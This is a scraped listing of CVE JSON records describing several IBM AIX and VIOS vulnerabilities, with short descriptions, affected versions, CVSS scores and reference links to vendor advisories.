http://www.vupen.com/english/advisories/2010/0556 | vdb-entry, x_refsource_VUPEN | |
http://www.ibm.com/support/docview.wss?uid=isg1IZ71590 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IZ71554 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IZ68194 | vendor-advisory, x_refsource_AIXAPAR | |
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12051 | vdb-entry, signature, x_refsource_OVAL | |
http://www.ibm.com/support/docview.wss?uid=isg1IZ71869 | vendor-advisory, x_refsource_AIXAPAR |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-07T01:06:52.525Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/qoslist_advisory.asc" }, { "name": "1023694", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://securitytracker.com/id?1023694" }, { "name": "ADV-2010-0556", "tags": [ "vdb-entry", "x_refsource_VUPEN", "x_transferred" ], "url": "http://www.vupen.com/english/advisories/2010/0556" }, { "name": "IZ71590", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71590" }, { "name": "IZ71554", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71554" }, { "name": "IZ68194", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ68194" }, { "name": "oval:org.mitre.oval:def:12051", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL", "x_transferred" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12051" }, { "name": "IZ71869", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71869" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2010-03-05T00:00:00", "descriptions": [ { "lang": "en", "value": "Buffer overflow in qoslist in bos.net.tcp.server in IBM AIX 6.1 and VIOS 2.1 allows local users to gain privileges via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-18T12:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/qoslist_advisory.asc" }, { "name": "1023694", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://securitytracker.com/id?1023694" }, { "name": "ADV-2010-0556", "tags": [ "vdb-entry", "x_refsource_VUPEN" ], "url": "http://www.vupen.com/english/advisories/2010/0556" }, { "name": "IZ71590", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71590" }, { "name": "IZ71554", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71554" }, { "name": "IZ68194", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ68194" }, { "name": "oval:org.mitre.oval:def:12051", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12051" }, { "name": "IZ71869", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71869" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2010-0961", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Buffer overflow in qoslist in bos.net.tcp.server in IBM AIX 6.1 and VIOS 2.1 allows local users to gain privileges via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://aix.software.ibm.com/aix/efixes/security/qoslist_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/qoslist_advisory.asc" }, { "name": "1023694", "refsource": "SECTRACK", "url": "http://securitytracker.com/id?1023694" }, { "name": "ADV-2010-0556", "refsource": "VUPEN", "url": "http://www.vupen.com/english/advisories/2010/0556" }, { "name": "IZ71590", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71590" }, { "name": "IZ71554", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71554" }, { "name": "IZ68194", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ68194" }, { "name": "oval:org.mitre.oval:def:12051", "refsource": "OVAL", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12051" }, { "name": "IZ71869", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ71869" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2010-0961", "datePublished": "2010-03-10T22:00:00", "dateReserved": "2010-03-10T00:00:00", "dateUpdated": "2024-08-07T01:06:52.525Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2010-1039
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-07T01:06:52.691Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "64729", "tags": [ "vdb-entry", "x_refsource_OSVDB", "x_transferred" ], "url": "http://osvdb.org/64729" }, { "name": "IZ75440", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ75440" }, { "name": "39911", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/39911" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026ID=5088" }, { "name": "oval:org.mitre.oval:def:11986", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL", "x_transferred" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11986" }, { "name": "40248", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/40248" }, { "name": "1023994", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id?1023994" }, { "name": "IZ75369", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ75369" }, { "name": "ADV-2010-1213", "tags": [ "vdb-entry", "x_refsource_VUPEN", "x_transferred" ], "url": "http://www.vupen.com/english/advisories/2010/1213" }, { "name": "IZ73757", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73757" }, { "name": "IZ73599", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73599" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://www.checkpoint.com/defense/advisories/public/2010/cpai-13-May.html" }, { "name": "20100520 HP-UX, IBM AIX, SGI IRIX Remote Vulnerability - CVE-2010-1039", "tags": [ "mailing-list", "x_refsource_BUGTRAQ", "x_transferred" ], "url": "http://www.securityfocus.com/archive/1/511405/100/0/threaded" }, { "name": "HPSBUX02523", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=127428077629933\u0026w=2" }, { "name": "oval:org.mitre.oval:def:12103", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL", "x_transferred" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12103" }, { "name": "IZ75465", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ75465" }, { "name": "IZ73874", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73874" }, { "name": "SSRT100036", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=127428077629933\u0026w=2" }, { "name": "ADV-2010-1199", "tags": [ "vdb-entry", "x_refsource_VUPEN", "x_transferred" ], "url": "http://www.vupen.com/english/advisories/2010/1199" }, { "name": "39835", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/39835" }, { "name": "hpux-nfsoncplus-privilege-escalation(58718)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/58718" }, { "name": "1024016", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://securitytracker.com/id?1024016" }, { "name": "ADV-2010-1212", "tags": [ "vdb-entry", "x_refsource_VUPEN", "x_transferred" ], "url": "http://www.vupen.com/english/advisories/2010/1212" }, { "name": "ADV-2010-1211", "tags": [ "vdb-entry", "x_refsource_VUPEN", "x_transferred" ], "url": "http://www.vupen.com/english/advisories/2010/1211" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/pcnfsd_advisory.asc" }, { "name": "IZ73590", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73590" }, { "name": "IZ73681", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73681" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2010-05-18T00:00:00", "descriptions": [ { "lang": "en", "value": "Format string vulnerability in the _msgout function in rpc.pcnfsd in IBM AIX 6.1, 5.3, and earlier; IBM VIOS 2.1, 1.5, and earlier; NFS/ONCplus B.11.31_09 and earlier on HP HP-UX B.11.11, B.11.23, and B.11.31; and SGI IRIX 6.5 allows remote attackers to execute arbitrary code via an RPC request containing format string specifiers in an invalid directory name." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-10T18:57:01", "orgId": "74586083-13ce-40fd-b46a-8e5d23cfbcb2", "shortName": "hp" }, "references": [ { "name": "64729", "tags": [ "vdb-entry", "x_refsource_OSVDB" ], "url": "http://osvdb.org/64729" }, { "name": "IZ75440", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ75440" }, { "name": "39911", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/39911" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026ID=5088" }, { "name": "oval:org.mitre.oval:def:11986", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11986" }, { "name": "40248", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/40248" }, { "name": "1023994", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id?1023994" }, { "name": "IZ75369", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ75369" }, { "name": "ADV-2010-1213", "tags": [ "vdb-entry", "x_refsource_VUPEN" ], "url": "http://www.vupen.com/english/advisories/2010/1213" }, { "name": "IZ73757", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73757" }, { "name": "IZ73599", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73599" }, { "tags": [ "x_refsource_MISC" ], "url": "http://www.checkpoint.com/defense/advisories/public/2010/cpai-13-May.html" }, { "name": "20100520 HP-UX, IBM AIX, SGI IRIX Remote Vulnerability - CVE-2010-1039", "tags": [ "mailing-list", "x_refsource_BUGTRAQ" ], "url": "http://www.securityfocus.com/archive/1/511405/100/0/threaded" }, { "name": "HPSBUX02523", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=127428077629933\u0026w=2" }, { "name": "oval:org.mitre.oval:def:12103", "tags": [ "vdb-entry", "signature", "x_refsource_OVAL" ], "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12103" }, { "name": "IZ75465", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ75465" }, { "name": "IZ73874", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73874" }, { "name": "SSRT100036", "tags": [ "vendor-advisory", "x_refsource_HP" ], "url": "http://marc.info/?l=bugtraq\u0026m=127428077629933\u0026w=2" }, { "name": "ADV-2010-1199", "tags": [ "vdb-entry", "x_refsource_VUPEN" ], "url": "http://www.vupen.com/english/advisories/2010/1199" }, { "name": "39835", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/39835" }, { "name": "hpux-nfsoncplus-privilege-escalation(58718)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/58718" }, { "name": "1024016", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://securitytracker.com/id?1024016" }, { "name": "ADV-2010-1212", "tags": [ "vdb-entry", "x_refsource_VUPEN" ], "url": "http://www.vupen.com/english/advisories/2010/1212" }, { "name": "ADV-2010-1211", "tags": [ "vdb-entry", "x_refsource_VUPEN" ], "url": "http://www.vupen.com/english/advisories/2010/1211" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/pcnfsd_advisory.asc" }, { "name": "IZ73590", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73590" }, { "name": "IZ73681", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73681" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "hp-security-alert@hp.com", "ID": "CVE-2010-1039", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Format string vulnerability in the _msgout function in rpc.pcnfsd in IBM AIX 6.1, 5.3, and earlier; IBM VIOS 2.1, 1.5, and earlier; NFS/ONCplus B.11.31_09 and earlier on HP HP-UX B.11.11, B.11.23, and B.11.31; and SGI IRIX 6.5 allows remote attackers to execute arbitrary code via an RPC request containing format string specifiers in an invalid directory name." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "64729", "refsource": "OSVDB", "url": "http://osvdb.org/64729" }, { "name": "IZ75440", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ75440" }, { "name": "39911", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/39911" }, { "name": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026ID=5088", "refsource": "CONFIRM", "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026ID=5088" }, { "name": "oval:org.mitre.oval:def:11986", "refsource": "OVAL", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11986" }, { "name": "40248", "refsource": "BID", "url": "http://www.securityfocus.com/bid/40248" }, { "name": "1023994", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id?1023994" }, { "name": "IZ75369", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ75369" }, { "name": "ADV-2010-1213", "refsource": "VUPEN", "url": "http://www.vupen.com/english/advisories/2010/1213" }, { "name": "IZ73757", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73757" }, { "name": "IZ73599", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73599" }, { "name": "http://www.checkpoint.com/defense/advisories/public/2010/cpai-13-May.html", "refsource": "MISC", "url": "http://www.checkpoint.com/defense/advisories/public/2010/cpai-13-May.html" }, { "name": "20100520 HP-UX, IBM AIX, SGI IRIX Remote Vulnerability - CVE-2010-1039", "refsource": "BUGTRAQ", "url": "http://www.securityfocus.com/archive/1/511405/100/0/threaded" }, { "name": "HPSBUX02523", "refsource": "HP", "url": "http://marc.info/?l=bugtraq\u0026m=127428077629933\u0026w=2" }, { "name": "oval:org.mitre.oval:def:12103", "refsource": "OVAL", "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12103" }, { "name": "IZ75465", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ75465" }, { "name": "IZ73874", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73874" }, { "name": "SSRT100036", "refsource": "HP", "url": "http://marc.info/?l=bugtraq\u0026m=127428077629933\u0026w=2" }, { "name": "ADV-2010-1199", "refsource": "VUPEN", "url": "http://www.vupen.com/english/advisories/2010/1199" }, { "name": "39835", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/39835" }, { "name": "hpux-nfsoncplus-privilege-escalation(58718)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/58718" }, { "name": "1024016", "refsource": "SECTRACK", "url": "http://securitytracker.com/id?1024016" }, { "name": "ADV-2010-1212", "refsource": "VUPEN", "url": "http://www.vupen.com/english/advisories/2010/1212" }, { "name": "ADV-2010-1211", "refsource": "VUPEN", "url": "http://www.vupen.com/english/advisories/2010/1211" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/pcnfsd_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/pcnfsd_advisory.asc" }, { "name": "IZ73590", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73590" }, { "name": "IZ73681", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IZ73681" } ] } } } }, "cveMetadata": { "assignerOrgId": "74586083-13ce-40fd-b46a-8e5d23cfbcb2", "assignerShortName": "hp", "cveId": "CVE-2010-1039", "datePublished": "2010-05-20T17:00:00", "dateReserved": "2010-03-19T00:00:00", "dateUpdated": "2024-08-07T01:06:52.691Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-38994
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6558948 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/213072 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T01:58:16.505Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6558948" }, { "name": "ibm-aix-cve202138994-dos (213072)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/213072" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2022-02-23T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 213072." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/UI:N/C:N/A:H/I:N/S:U/PR:N/AC:L/RC:C/RL:O/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-02-24T17:05:12", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6558948" }, { "name": "ibm-aix-cve202138994-dos (213072)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/213072" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-02-23T00:00:00", "ID": "CVE-2021-38994", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX kernel to cause a denial of service. IBM X-Force ID: 213072." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6558948", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6558948 (AIX)", "url": "https://www.ibm.com/support/pages/node/6558948" }, { "name": "ibm-aix-cve202138994-dos (213072)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/213072" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-38994", "datePublished": "2022-02-24T17:05:12.368274Z", "dateReserved": "2021-08-16T00:00:00", "dateUpdated": "2024-09-16T17:03:54.297Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-29860
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6516774 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/206084 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T22:18:03.145Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6516774" }, { "name": "ibm-aix-cve202129860-info-disc (206084)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/206084" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] }, { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" } ] } ], "datePublic": "2021-11-16T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the libc.a library to expose sensitive information. IBM X-Force ID: 206084." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/UI:N/AC:L/C:H/A:N/I:N/PR:N/AV:L/S:U/RL:O/RC:C/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-11-17T14:00:14", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6516774" }, { "name": "ibm-aix-cve202129860-info-disc (206084)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/206084" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-11-16T00:00:00", "ID": "CVE-2021-29860", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } }, { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the libc.a library to expose sensitive information. IBM X-Force ID: 206084." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "L", "C": "H", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6516774", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6516774 (AIX)", "url": "https://www.ibm.com/support/pages/node/6516774" }, { "name": "ibm-aix-cve202129860-info-disc (206084)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/206084" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-29860", "datePublished": "2021-11-17T14:00:14.696316Z", "dateReserved": "2021-03-31T00:00:00", "dateUpdated": "2024-09-17T02:51:31.350Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-22350
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6560390 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/220394 | vdb-entry, x_refsource_XF |
